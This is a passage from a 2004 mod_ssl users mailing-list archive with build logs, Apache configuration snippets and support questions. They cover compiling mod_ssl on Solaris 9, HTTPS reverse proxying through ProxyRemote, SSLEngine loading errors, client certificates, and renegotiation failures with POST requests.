ssl_scache_shmht.c && mv ssl_scache_shmht.o ssl_scache_shmht.lo
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 
-DMOD_SSL=208122 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite `../../apaci` 
-fPIC -DSHARED_MODULE -DSSL_COMPAT -DSSL_ENGINE 
-I/apache/openssl-0.9.7e/include -DMOD_SSL_VERSION=\"2.8.22\" 
ssl_scache_shmcb.c && mv ssl_scache_shmcb.o ssl_scache_shmcb.lo
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 
-DMOD_SSL=208122 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite `../../apaci` 
-fPIC -DSHARED_MODULE -DSSL_COMPAT -DSSL_ENGINE 
-I/apache/openssl-0.9.7e/include -DMOD_SSL_VERSION=\"2.8.22\" ssl_expr.c 
&& mv ssl_expr.o ssl_expr.lo
flex -Pssl_expr_yy -s -B ssl_expr_scan.l
sed -e '/$Header:/d' ssl_expr_scan.c && rm -f 
lex.ssl_expr_yy.c
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 
-DMOD_SSL=208122 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite `../../apaci` 
-fPIC -DSHARED_MODULE -DSSL_COMPAT -DSSL_ENGINE 
-I/apache/openssl-0.9.7e/include -DMOD_SSL_VERSION=\"2.8.22\" 
ssl_expr_scan.c && mv ssl_expr_scan.o ssl_expr_scan.lo
lex.ssl_expr_yy.c:1900: error: parse error before numeric constant
lex.ssl_expr_yy.c: In function `ssl_expr_yy_scan_string':
lex.ssl_expr_yy.c:1901: error: number of arguments doesn't match prototype
lex.ssl_expr_yy.c:293: error: prototype declaration
lex.ssl_expr_yy.c:1903: warning: passing arg 1 of `strlen' makes pointer 
from integer without a cast
lex.ssl_expr_yy.c:1903: warning: passing arg 1 of 
`ssl_expr_yy_scan_bytes' makes pointer from integer without a cast
make[4]: *** [ssl_expr_scan.lo] Error 1
make[3]: *** [all] Error 1
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/apache/apache_1.3.33/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/apache/apache_1.3.33'
make: *** [build] Error 2

Workaround tried:
ssl_expr_scan.c:
-YY_BUFFER_STATE ssl_expr_yy_scan_string (yyconst char * str )
+YY_BUFFER_STATE ssl_expr_yy_scan_string (yyconst char * str_state )

Makefile:
ssl_expr_scan.c: ssl_expr_scan.l ssl_expr_parse.h
        #flex -Pssl_expr_yy -s -B ssl_expr_scan.l
        #sed -e '/$$Header:/d' ssl_expr_scan.c && rm 
-f lex.ssl_expr_yy.c
        echo SKIPPING FLEX STUFF

This results in:
# make clean
# make
[...]
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 
-DMOD_SSL=208122 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite `../../apaci` 
-fPIC -DSHARED_MODULE -DSSL_COMPAT -DSSL_ENGINE 
-I/apache/openssl-0.9.7e/include -DMOD_SSL_VERSION=\"2.8.22\" 
ssl_util_sdbm.c && mv ssl_util_sdbm.o ssl_util_sdbm.lo
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=290 
-DMOD_SSL=208122 -DEAPI -DUSE_EXPAT -I../../lib/expat-lite `../../apaci` 
-fPIC -DSHARED_MODULE -DSSL_COMPAT -DSSL_ENGINE 
-I/apache/openssl-0.9.7e/include -DMOD_SSL_VERSION=\"2.8.22\" 
ssl_util_table.c && mv ssl_util_table.o ssl_util_table.lo
rm -f libssl.so
ld -L/apache/openssl-0.9.7e -G  -o libssl.so mod_ssl.lo 
ssl_engine_config.lo ssl_engine_compat.lo ssl_engine_ds.lo 
ssl_engine_dh.lo ssl_engine_init.lo ssl_engine_kernel.lo 
ssl_engine_rand.lo ssl_engine_io.lo ssl_engine_log.lo 
ssl_engine_mutex.lo ssl_engine_pphrase.lo ssl_engine_vars.lo 
ssl_engine_ext.lo ssl_scache.lo ssl_scache_dbm.lo ssl_scache_shmht.lo 
ssl_scache_shmcb.lo ssl_expr.lo ssl_expr_scan.lo ssl_expr_parse.lo 
ssl_expr_eval.lo ssl_util.lo ssl_util_ssl.lo ssl_util_sdbm.lo 
ssl_util_table.lo  -lssl -lcrypto 
-L/usr/local/lib/gcc/sparc-sun-solaris2.9/3.4.2 -lgcc
ld: skipping incompatible /apache/openssl-0.9.7e/libssl.a when searching 
for -lssl
ld: cannot find -lssl
make[4]: *** [libssl.so] Error 1
make[3]: *** [all] Error 1
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/apache/apache_1.3.33/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/apache/apache_1.3.33'
make: *** [build] Error 2

Any ideas gratefully received; I'm beginning to doubt my sanity :-)

Steve

--
Steve Parker
steve@steve-parker.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 17 08:38:40 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EC3D3A8A65; Fri, 17 Dec 2004 08:38:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 90358A8948
	for ; Fri, 17 Dec 2004 08:38:34 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id 254E041FA
	for ; Fri, 17 Dec 2004 08:40:12 +0100 (CET)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 10460-10 for ;
 Fri, 17 Dec 2004 08:40:09 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id DE9F73EF8A; Fri, 17 Dec 2004 08:40:09 +0100 (CET)
Date: Fri, 17 Dec 2004 08:40:09 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Solaris 9 / modssl-2.8.22-1.3.33 problems
Message-ID: <20041217074009.GA10756@cr>
Mail-Followup-To: modssl-users@modssl.org
References: <41C22F7E.8080900@steve-parker.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <41C22F7E.8080900@steve-parker.org>
X-Mailer: mutt
X-Virus-Scanned: by amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Dec 17, 2004 at 12:59:42AM +0000, Steve Parker wrote:
> Summary:
> It seems from http://forum.sun.com/thread.jspa?threadID=18986&tstart=15 
> that this was a problem with 2.8.17,  fixed in 2.8.18 with a sed command 
> on line 244 of apache-1.3.33/src/modules/ssl/Makefile:
> 
> 242: ssl_expr_scan.c: ssl_expr_scan.l ssl_expr_parse.h
> 243:         flex -Pssl_expr_yy -s -B ssl_expr_scan.l
> 244:         sed -e '/$$Header:/d' ssl_expr_scan.c 
> && rm -f lex.ssl_expr_yy.c
> 
You shouldn't need to regenerate these files - most likely a timestamp
problem that results in make thinking that the lex/yacc files has been
updated later than the output .c and .h - simply touch the output files
to make sure they have a newer timestamp, then make won't try to 
regenerate.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 17 13:20:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 71B88A8A79; Fri, 17 Dec 2004 13:20:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail4.telekom.de (mail4.telekom.de [195.243.210.197])
	by master.modssl.org (Postfix) with ESMTP id C72DEA8933
	for ; Fri, 17 Dec 2004 13:20:03 +0100 (CET)
Received: from u9jwn.mgb01.telekom.de by mail2.dmz.telekom.de with ESMTP for modssl-users@modssl.org; Fri, 17 Dec 2004 13:19:33 +0100
Received: from mail2004.b3.dsh.de ([10.33.144.68] [10.33.144.68]) by u9jwn.mgb01.telekom.de with ESMTP for modssl-users@modssl.org; Fri, 17 Dec 2004 13:20:17 +0100
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: https/SSL and ProxyRemote did not work when using a reverse proxy (PLEASE HELP:)
Date: Fri, 17 Dec 2004 13:19:49 +0100
Message-Id: <24AD31086062F34F92767570ABC662FF4147E5@mail2004.b3.dsh.de>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: https/SSL and ProxyRemote did not work when using a reverse proxy (PLEASE HELP:)
Thread-Index: AcTkMl+8+DiEjSV6T6qQW5r8HOL9bQ==
From: "Hanack Leif" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hanack Leif" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

i have nearly the same problem like
"nerb"
(http://marc.theaimsgroup.com/?l=3Dapache-httpd-users&m=3D109474858416348=
&w=3D
2)
and
"fitzner"
(http://marc.theaimsgroup.com/?l=3Dapache-httpd-users&m=3D110309511816081=
&w=3D
2)
have.
They do not get any answer. Hope dies last:)) Therefore i hope that
someone can give 'us' an answer, even if it is a "no, that do not work".

I'm trying to get the following szenario to work with Apache
2.0.51/OpenSSL 0.9.7d.

Client --http--> Reverse Proxy  --internal--> Forward Proxy
(ProxyRemote) --https--> Webserver

Ralf Engelschall said: "when you want to forward to a HTTPS target you
need HTTPS support in mod_proxy. That's only possible with mod_ssl
(which enhanced mod_proxy for HTTPS).  Then you can do all: Accept HTTP
and HTTPS and connect to HTTP and HTTPS targets, i.e. create gateways in
all combinations."

Is it possible that SSL-forwarding is not working when using
ProxyRemote?

My logs :

[Mon Dec 13 14:14:50 2004] [debug] ssl_engine_io.c(1517): OpenSSL: I/O
error, 7 bytes expected to read on BIO#a55e90 [mem: a5b670] [Mon Dec 13
14:14:50 2004] [debug] ssl_engine_kernel.c(1793): OpenSSL:
Exit: error in SSLv2/v3 read server hello A [Mon Dec 13 14:14:50 2004]
[info] SSL Proxy connect failed [Mon Dec 13 14:14:50 2004] [info]
Connection to child 1 closed with abortive shutdown(server
172.16.37.124:80, client 172.16.34.50) [Mon Dec 13 14:14:50 2004]
[error] (20014)Error string not specified
yet: proxy: request failed to 172.16.34.50:3128 (www-cache)

My config :=20


ServerName intra-xy.com
ServerAdmin mailadmin@example.com
ProxyRequests Off
ProxyRemote * http://proxyIP:3128
SSLProxyEngine on
ProxyPass / https://remoteServerIP/
ProxyPassReverse / https://remoteServerIP/ 

In a test szenario where i can reach the 'remoteServer' directly
(without a proxy) it is working.

Client --http--> Reverse Proxy  --https--> Webserver

Sh*t, that the remoteServer is only reachable via proxy :)

Hope you can help me,
thanks in advance, Leif
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 17 17:14:00 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 296E1A8A79; Fri, 17 Dec 2004 17:14:00 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp800.mail.ukl.yahoo.com (smtp800.mail.ukl.yahoo.com [217.12.12.142])
	by master.modssl.org (Postfix) with SMTP id 91D5DA8933
	for ; Fri, 17 Dec 2004 17:13:54 +0100 (CET)
Received: from unknown (HELO ?192.168.1.40?) (modssl-users@modssl.org@81.154.26.215 with poptime)
  by smtp800.mail.ukl.yahoo.com with SMTP; 17 Dec 2004 16:13:44 -0000
Message-ID: <41C3048A.8080901@steve-parker.org>
Date: Fri, 17 Dec 2004 16:08:42 +0000
From: Steve Parker 
User-Agent: Mozilla Thunderbird 1.0RC1 (X11/20041203)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Solaris 9 / modssl-2.8.22-1.3.33 problems
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Parker 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I see from http://marc.theaimsgroup.com/?l=apache-modssl&m=110326922031002&w=2 that Mads Toftum wrote:

> You shouldn't need to regenerate these files - most likely a timestamp
> problem that results in make thinking that the lex/yacc files has been
> updated later than the output .c and .h - simply touch the output files
> to make sure they have a newer timestamp, then make won't try to 
> regenerate.

I re-extracted the tarballs from scratch, rinse, repeat.
Used touch to ensure that timestamp on ssl_expr_scan.l was 15:18 today, timestamps on *.c, *.h were 15:19 today.
Same problem.

Clean up, configure again.
mod-ssl$> ./configure --with-apache=../apache-1.3.33 etc...
mod-ssl$> cd ../apache-1.3.33
apache-1.3.33$> vi src/modules/ssl/Makefile
  ...  edit to read:
ssl_expr_scan.c: ssl_expr_scan.l ssl_expr_parse.h
        echo SKIPPING SSL_EXPR_SCAN.C
#       flex -Pssl_expr_yy -s -B ssl_expr_scan.l
#       sed -e '/$$Header:/d' ssl_expr_scan.c && rm -f lex.ssl_expr_yy.c
apache-1.3.33$> make

This is progress - the build succeeds (hurrah!). It's hammers for walnuts, but if it works, that's enough for me for now.
When it gets to the linking stage, it complains that libssl is "incompatible"

rm -f libssl.so
ld -L/apache/openssl-0.9.7e -G  -o libssl.so mod_ssl.lo ssl_engine_config.lo ssl_engine_compat.lo ssl_engine_ds.lo ssl_engine_dh.lo ssl_engine_init.lo ssl_engine_kernel.lo ssl_engine_rand.lo ssl_engine_io.lo ssl_engine_log.lo ssl_engine_mutex.lo ssl_engine_pphrase.lo ssl_engine_vars.lo ssl_engine_ext.lo ssl_scache.lo ssl_scache_dbm.lo ssl_scache_shmht.lo ssl_scache_shmcb.lo ssl_expr.lo ssl_expr_scan.lo ssl_expr_parse.lo ssl_expr_eval.lo ssl_util.lo ssl_util_ssl.lo ssl_util_sdbm.lo ssl_util_table.lo  -lssl -lcrypto -L/usr/local/lib/gcc/sparc-sun-solaris2.9/3.4.2 -lgcc
ld: skipping incompatible /apache/openssl-0.9.7e/libssl.a when searching for -lssl
ld: cannot find -lssl
make[4]: *** [libssl.so] Error 1
make[3]: *** [all] Error 1
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/apache/apache_1.3.33/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/apache/apache_1.3.33'
make: *** [build] Error 2

apache-1.3.33$> ld --version
GNU ld 2.11.2
Copyright 2001 Free Software Foundation, Inc.
This program is free software; you may redistribute it under the terms of
the GNU General Public License.  This program has absolutely no warranty.
  Supported emulations:
   elf32_sparc
   elf64_sparc

apache-1.3.33$> file /apache/openssl-0.9.7e/libssl.a
/apache/openssl-0.9.7e/libssl.a:        current ar archive, not a dynamic executable or shared object

My best guess (repeat, this time editing apache-1.3.33/src/Configuration, set EXTRA_CFLAGS="-m64" before configure, 
and removing the flex stuff before the make) doesn't fix it.
Any ideas what ld means by saying that libssl is incompatible?

Thanks,

Steve.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 17 17:33:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 77998A8A79; Fri, 17 Dec 2004 17:33:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp808.mail.ukl.yahoo.com (smtp808.mail.ukl.yahoo.com [217.12.12.198])
	by master.modssl.org (Postfix) with SMTP id 8FE65A8933
	for ; Fri, 17 Dec 2004 17:33:19 +0100 (CET)
Received: from unknown (HELO ?192.168.1.40?) (steve@itops.com@81.154.26.215 with poptime)
  by smtp808.mail.ukl.yahoo.com with SMTP; 17 Dec 2004 16:33:08 -0000
Message-ID: <41C30917.6080104@steve-parker.org>
Date: Fri, 17 Dec 2004 16:28:07 +0000
From: Steve Parker 
User-Agent: Mozilla Thunderbird 1.0RC1 (X11/20041203)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org, steve@itops.com
Subject: Re: Solaris 9 / modssl-2.8.22-1.3.33 problems
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Parker 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Fixed it - using the sytem linker (/usr/ccs/bin/ld) instead of the GNU 
linker now works.

Summary of fixes required to build 64-bit modssl-2.8.22 on Solaris 9 SPARC:

  - CC="gcc -m64"
  - Remove the "flex" command from 
apache-1.3.33/src/modules/ssl/Makefile before running "make"
  - PATH=/usr/ccs/bin:/usr/local/bin:$PATH  (or any other method of 
making it use the Solaris ld, not the GNU one).

Regards,

Steve.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Dec 18 23:51:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 53A54A8A6D; Sat, 18 Dec 2004 23:51:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mout.perfora.net (mout.perfora.net [217.160.230.40])
	by master.modssl.org (Postfix) with ESMTP id 9A4ABA8A4D
	for ; Sat, 18 Dec 2004 23:51:03 +0100 (CET)
Received: from adsl-69-104-17-166.dsl.irvnca.pacbell.net[69.104.17.166] (helo=[127.0.0.1])
	by mrelay.perfora.net with ESMTP (Nemesis),
	id 0MKz1m-1CfnPY0R3N-0000wI; Sat, 18 Dec 2004 17:50:52 -0500
Message-ID: <41C4B44B.40001@pariahdesign.net>
Date: Sat, 18 Dec 2004 14:50:51 -0800
From: Paul Madoff 
Organization: Pariah Design
User-Agent: Mozilla Thunderbird 0.9 (Windows/20041103)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Invalid command SSLEngine
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Provags-ID: perfora.net abuse@perfora.net login:c18c36ed990a96715a76f87e4d850809
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul Madoff 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Newbie to list, please tell me if I'm got the wrong one! :)

SuSE 9, Apache 1.3.28 with curl 7.10.5 and openSSL 0.9.7b --> was 
working with SSL

Updated with rpms to curl 7.11.2 and openSSL 0.9.7d --> Apache won't 
restart with SSL.

Syntax error on line 1419 of /etc/httpd/httpd.conf:
Invalid command 'SSLEngine', perhaps mis-spelled or defined by a module 
not included in the server configuration
/usr/sbin/apachectl startssl: httpd could not be started


LoadModule ssl_module         /usr/lib/apache/libssl.so


Also tried with no success:
LoadModule ssl_module         /usr/lib/apache/libssl.so.0
LoadModule ssl_module         /usr/lib/apache/libssl.so.0.9.7

Last clue I found on the internet suggested that mod_ssl was not 
loading. Is that my problem or have I missed something?

thanks,
Paul



 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 22 03:26:05 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0B4F0A89B1; Wed, 22 Dec 2004 03:26:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from adrastea.tiggee.com (ns5.dnsmadeeasy.com [63.219.151.12])
	by master.modssl.org (Postfix) with ESMTP id 571ABA8995
	for ; Wed, 22 Dec 2004 03:25:55 +0100 (CET)
Received: from DTALAPTOP02 (AC96D922.ipt.aol.com [172.150.217.34]) (authenticated as dashley with LOGIN if spam please forward this message with this full header to abuse@dnsmadeeasy.com for ; Tue, 21 Dec 2004 21:25:40 -0500
From: "David T. Ashley" 
To: 
Subject: Client Certificates (Help!)
Date: Tue, 21 Dec 2004 21:29:21 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David T. Ashley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Does anyone have any good URLs or instructions about how to create client
certificates for browsers so that only browsers with the certificate can
connect to the server (or view certain directories on the server)?

I tried one procedure I found on the web, and it ended up with Apache
complaining about the keys and certificates it had.  The best I could do
myself was a self-signed SSL certificate (which worked fine), but the client
certificates didn't work out.

I'll try any procedures anyone supplies, and if that doesn't work I'll post
detailed information about what I tried and what went wrong.

The site, by the way, is www.e-collab.com.  The self-signed SSL certificate
for Apache worked fine.  It was just the more advanced stuff that eluded me.

Thanks a lot!

Merry Christmas!

Dave Ashley.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 22 20:36:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 66324A895E; Wed, 22 Dec 2004 20:36:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.aaisp.net.uk (A.painless.aaisp.net.uk [81.187.81.51])
	by master.modssl.org (Postfix) with ESMTP id E29D6A8978
	for ; Wed, 22 Dec 2004 20:35:48 +0100 (CET)
Received: from [81.2.96.209] (helo=pinky)
	by smtp.aaisp.net.uk with esmtp (Exim 4.42)
	id 1ChCGK-0007Px-7S
	for modssl-users@modssl.org; Wed, 22 Dec 2004 19:35:08 +0000
From: Casper Gasper 
To: modssl-users@modssl.org
Subject: Re: Client Certificates (Help!)
Date: Wed, 22 Dec 2004 19:35:15 +0000
User-Agent: KMail/1.7.1
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200412221935.16054.cas@caspergasper.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Casper Gasper 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wednesday 22 December 2004 02:29, David T. Ashley wrote:
> Hi,
>
> Does anyone have any good URLs or instructions about how to create client
> certificates for browsers so that only browsers with the certificate can
> connect to the server (or view certain directories on the server)?

 Try this:

http://www.drh-consultancy.demon.co.uk/pkcs12faq.html




  Casper.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Dec 25 21:34:21 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9727FA8972; Sat, 25 Dec 2004 21:34:21 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from adrastea.tiggee.com (ns5.dnsmadeeasy.com [63.219.151.12])
	by master.modssl.org (Postfix) with ESMTP id CD68CA8933
	for ; Sat, 25 Dec 2004 21:34:16 +0100 (CET)
Received: from DTALAPTOP02 (AC9097F9.ipt.aol.com [172.144.151.249]) (authenticated as dashley with LOGIN if spam please forward this message with this full header to abuse@dnsmadeeasy.com for ; Sat, 25 Dec 2004 15:34:02 -0500
From: "David T. Ashley" 
To: 
Subject: Client Authentication POST Problem
Date: Sat, 25 Dec 2004 15:37:44 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David T. Ashley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I installed Bugzilla, and the directory it is in has the

VerifyClient require

and all the Apache directives set in the httpd.conf file.  It works fine
(the browsers makes me choose a client certificate) but when I submit a form
into Bugzilla I get an error to the effect that POST is not allowed, and
this appears in the Apache logs:

[Fri Dec 24 19:59:24 2004] [error] SSL Re-negotiation in conjunction with
POST
method not supported!\nhint: try SSLOptions +OptRenegotiate

I tried the fix recommended in the log message, but it doesn't work.  I
seemed to make it through one form OK, but then the next one got me the same
error message, both displayed by the browser and in the Apache logs.

Any other suggestions?

Thanks, Dave.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 26 03:48:18 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A66A1A8972; Sun, 26 Dec 2004 03:48:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from server1050.gisol.com (server1050.gisol.com [216.240.136.125])
	by master.modssl.org (Postfix) with ESMTP id 17D61A8958
	for ; Sun, 26 Dec 2004 03:48:09 +0100 (CET)
Received: from [201.248.208.236] (helo=[192.168.0.224])
	by server1050.gisol.com with esmtp (Exim 4.43)
	id 1CiORc-0006hS-U7
	for modssl-users@modssl.org; Sat, 25 Dec 2004 18:47:45 -0800
Subject: Re: Client Authentication POST Problem
From: Adolfo Bello 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
Content-Type: text/plain
Date: Sat, 25 Dec 2004 22:47:31 -0400
Message-Id: <1104029251.5493.2.camel@localhost>
Mime-Version: 1.0
X-Mailer: Evolution 2.0.3-1mdk 
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server1050.gisol.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12]
X-AntiAbuse: Sender Address Domain - bisapi.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Adolfo Bello 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sat, 2004-12-25 at 15:37 -0500, David T. Ashley wrote:
> Hi,
> 
> I installed Bugzilla, and the directory it is in has the
> 
> VerifyClient require
> 
> and all the Apache directives set in the httpd.conf file.  It works fine
> (the browsers makes me choose a client certificate) but when I submit a form
> into Bugzilla I get an error to the effect that POST is not allowed, and
> this appears in the Apache logs:
> 
> [Fri Dec 24 19:59:24 2004] [error] SSL Re-negotiation in conjunction with
> POST
> method not supported!\nhint: try SSLOptions +OptRenegotiate
> 
> I tried the fix recommended in the log message, but it doesn't work.  I
> seemed to make it through one form OK, but then the next one got me the same
> error message, both displayed by the browser and in the Apache logs.
> 
> Any other suggestions?
> 
> Thanks, Dave.

It just doesn't work in Apache 2.0.x.

Use Apache 1.3.x.

Adolfo Bello

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 26 03:53:49 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A9C29A8972; Sun, 26 Dec 2004 03:53:49 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ares.cs.Virginia.EDU (ares.cs.Virginia.EDU [128.143.137.19])
	by master.modssl.org (Postfix) with ESMTP id F0111A8958
	for ; Sun, 26 Dec 2004 03:53:44 +0100 (CET)
